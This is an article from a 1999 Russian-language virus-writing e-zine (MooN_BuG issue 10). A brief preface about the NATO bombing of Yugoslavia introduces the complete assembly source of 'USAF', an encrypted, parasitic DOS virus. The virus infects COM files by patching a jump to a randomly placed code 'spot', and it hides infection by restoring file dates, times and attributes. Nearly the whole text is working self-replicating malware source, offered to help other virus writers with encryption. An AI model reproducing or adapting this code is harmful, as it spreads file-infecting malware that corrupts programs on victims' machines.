[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 10, Apr 1999 file 007
-* Just virus, United States Air Force version 0.90 (BETA) *-
Copy-ya-right (c) March 1999, Mongoose of -=MY=-
Представляя этот вирус вам, я поступаю против своих принципов и принципов
группы Misdirected Youth, т.к. этот журнал и вирус сразу же после выпуска по-
падет в руки аверов. Хотя этот вирус показывает, что я думаю о бомбежке Югос-
лавии. Но этот вирус так же может помоч вирмейкерам разобраться с шифровкой.
Комментарии как всегда на английском языке. =))
Метод заражения вируса USAF v0.90:
┌──────┐
┌─>│ JUMP │─┐ Джамп на пятно (JMP SPOT + INFECTION MARKER)
│ │ XXXX │ │
│┌─│ SPOT │<┘ Пятно, оно представляет из себя CALL CODE (переход к телу
││ │ XXXX │ вируса) + 6 байт "мусора"
││ ├──────┤
│└>│ CODE │ Собственно тело вируса, делает дела, востанавливает байты
└──└──────┘ под пятном и на 100h, затем передает управление на 100h
─────[USAF.ASM]──────[START]──────────────────────────────────────────────────
;┌───────────────────────────────────────────────────────────────────────────┐
;│ USAF version 0.90 (BETA) [C] Mongoose of Misdirected Youth, March '99 │
;├───────────────────────────────────────────────────────────────────────────┤
;│ Virii Type: COM.CRYPT.VIRUS (parasitic) │
;│ Stealth: Save date, time & attributes │
;│ Error Handler: Yep │
;│ Virii Size: 618 │
;│ Need to compile: Compile with one pass │
;└───────────────────────────────────────────────────────────────────────────┘
.model tiny
.code
org 100h
spot_length equ 9 ; Spot length
start: sub bp,bp ; Zero register
jmp restore_orig
real_start: mov dx,0 ; Key to decrypt code
code_offset: mov bx,0 ; Code offset
mov cx,(string-original) ; Code size
decrypt_cycle: xor byte ptr [bx],dl
inc dx
xor byte ptr [bx],dh
inc bx
loop decrypt_cycle
original: pop di ; Get spot position-3
sub di,3 ; Calculate spot position
call calculate_ip ; Calculate DELTA offset (IP)
calculate_ip: pop si
xchg bp,si
sub bp,offset calculate_ip
restore_spot: lea si,[bp+spot] ; Restore original bytes under
mov cx,spot_length ; spot
cld
rep movsb
restore_orig: mov di,100h ; Restore original bytes
lea si,[bp+original_bytes]
movsw
movsw
set_seed: in ax,40h ; Genate seed for RNG
mov word ptr [bp+seed],ax ; Put seed
set_new_dta: mov ah,1ah ; Set new DTA
lea dx,[bp+dta]
int 21h
mov ax,3524h ; Get orig Int 24h
int 21h
mov word ptr [bp+old_int24],bx
mov word ptr [bp+old_int24+2],es
mov ax,2524h ; Set new handler
lea dx,[bp+new_int24]
int 21h
push cs
pop es
find_first: mov ah,4eh ; Find first COM-file
mov cx,7
lea dx,[bp+file_mask] ; File mask
find_next: int 21h
jnc get_attrib ; Jump if okey
jmp return_control ; Jump if error
get_attrib: mov ax,4300h ; Get attributes
lea dx,[bp+dta+1eh]
int 21h
mov word ptr [bp+attribs],cx ; Save attributes
mov ax,4301h ; Clear attributes
sub cx,cx
lea dx,[bp+dta+1eh]
int 21h
open_file: mov ax,3d02h ; Open for read'n'write
lea dx,[bp+dta+1eh] ; Filename
int 21h
jc close_file ; Jump if error
xchg bx,ax ; Move file handle to BX
mov ax,5700h ; Get file date and time
int 21h
mov word ptr [bp+time],cx ; Save time
mov word ptr [bp+date],dx ; Save date
mov cx,word ptr [bp+dta+1ah] ; File size
cmp cx,1000 ; Check file size
jb close_file
cmp cx,64000
ja close_file
mov ah,3fh ; Read first 4 bytes
mov cx,4
lea dx,[bp+original_bytes]
int 21h
cmp byte ptr [bp+original_bytes+3],5
jz close_file ; Jump if infected
cmp word ptr [bp+original_bytes],'ZM'
jz close_file ; Jump if EXE
again: mov cx,word ptr [bp+dta+1ah] ; File size
sub cx,100
call get_rnd_number ; Get rnd number from 0 to CX
cmp ax,100
jb again ; Jump if 100 or lower
call make_spot ; Make spot
close_file: mov ax,5701h ; Restore orig date and time
lea cx,[bp+time]
lea dx,[bp+date]
int 21h
mov ah,3eh ; Close file
int 21h
mov ax,4301h ; Restore file attributes
mov cx,[bp+attribs]
lea dx,[bp+dta+1eh]
int 21h
mov ah,4fh ; Find next file
jmp find_next
db 'А ты бомбил Югославию?',0
db 'Help NATO, before it''s not too late!'
return_control:mov ax,2524h ; Restore old int 24 handler
lea dx,[bp+old_int24]
int 21h
push cs
pop ds
mov ah,1ah ; Restore DTA
mov dx,80h
int 21h
mov ax,100h ; Jump to 100h (file begin)
jmp ax
db 'USAF by Mongoose / Misdirected Youth'
;┌────────────────────────────────────────────────────────────────────────────
;│ Generate'n'write SPOT
;└────────────────────────────────────────────────────────────────────────────
make_spot: mov ax,4200h ; Move pointer to spot location
sub cx,cx
mov dx,si
push cx dx
int 21h
mov ah,3fh ; Read bytes "under spot"
mov cx,spot_length ; Spot length
lea dx,[bp+spot] ; Buffer to save bytes
int 21h
mov cx,word ptr [bp+dta+1ah] ; Generate spot
sub cx,si ; Get JMP REAL_START
sub cx,3
mov word ptr [bp+spot_buf+1],cx
mov byte ptr [bp+spot_buf],0e8h
mov word ptr [bp+spot_buf+3],di
mov ax,4200h ; Move pointer to spot location
pop dx cx
int 21h
mov ah,40h ; Write spot
mov cx,spot_length ; Spot length
lea dx,[bp+spot_buf]
int 21h
;┌────────────────────────────────────────────────────────────────────────────
;│ Infect file
;└────────────────────────────────────────────────────────────────────────────
infect: mov cx,si ; Generate jump to SPOT
sub cx,3
mov word ptr [bp+buffer+1],cx; Spot location
mov byte ptr [bp+buffer],0e9h; JMP instruction
mov byte ptr [bp+buffer+3],5 ; Infection marker
mov ax,4200h
sub cx,cx
cwd
int 21h
mov ah,40h ; Write JMP
mov cx,4
lea dx,[bp+buffer]
int 21h
mov ax,4202h ; Move pointer to end of file
sub cx,cx
cwd
int 21h
in ax,40h ; Key to decrypt code
xchg cx,ax
call get_rnd_number
mov word ptr [bp+real_start+1],ax
mov cx,word ptr [bp+dta+1ah] ; Crypted code location in file
add cx,(original-real_start)+100h
mov word ptr [bp+code_offset+1],cx
lea di,[bp+xor_buffer]
lea si,[bp+real_start]
mov cx,(end_of_code-real_start)
push di ; Save code location
cld
rep movsb
pop di ; Restore code location
add di,(original-real_start)
mov cx,(string-original)
crypt_cycle: xor byte ptr [di],al
inc ax
xor byte ptr [di],ah
inc di
loop crypt_cycle
mov ah,40h
mov cx,(end_of_code-real_start)
lea dx,[bp+xor_buffer]
int 21h
ret
;┌────────────────────────────────────────────────────────────────────────────
;│ New int 24 handler
;└────────────────────────────────────────────────────────────────────────────
new_int24: mov al,3
iret
;┌─────────────────────────┬──────────────────────────────────────────────────
;│ Random number generator │ Generate random number from 0 to CX
;└─────────────────────────┴──────────────────────────────────────────────────
get_rnd_number:push bx cx
mov ax,[bp+seed]
mov bx,261
mul bx
mov bx,65521
div bx
or dx,dx
jnz okey
inc word ptr [bp+seed]
jmp get_rnd_number
okey: mov word ptr [bp+seed],dx
mov ax,dx
sub dx,dx
div cx
mov ax,dx
pop cx bx
ret
;┌────────────────────────────────────────────────────────────────────────────
;│ DATA
;└────────────────────────────────────────────────────────────────────────────
file_mask db '*.com',0 ; File length
spot db 9 dup (?)
original_bytes db 0cdh,20h,?,? ; Original bytes
string db 'Misdirected Youth'
end_of_code label byte
;┌────────────────────────────────────────────────────────────────────────────
;│ HEAP
;└────────────────────────────────────────────────────────────────────────────
dta db 43 dup (?) ; Temporary DTA
seed dw ? ; Seed for RNG
date dw ? ; For date
time dw ? ; For time
buffer db 4 dup (?) ; Temporary buffer
attribs dw ? ; For attrib
spot_buf db spot_length dup (?) ; Temporary spot buffer
old_int24 dd ? ; Old Int 24 handler
xor_buffer db (end_of_code-real_start) dup (?)
end start
─────[USAF.ASM]──────[EOF]─────────────────────────────────────────────────────
Copy-ya-right (c) March 1999, Mongoose of -=MY=-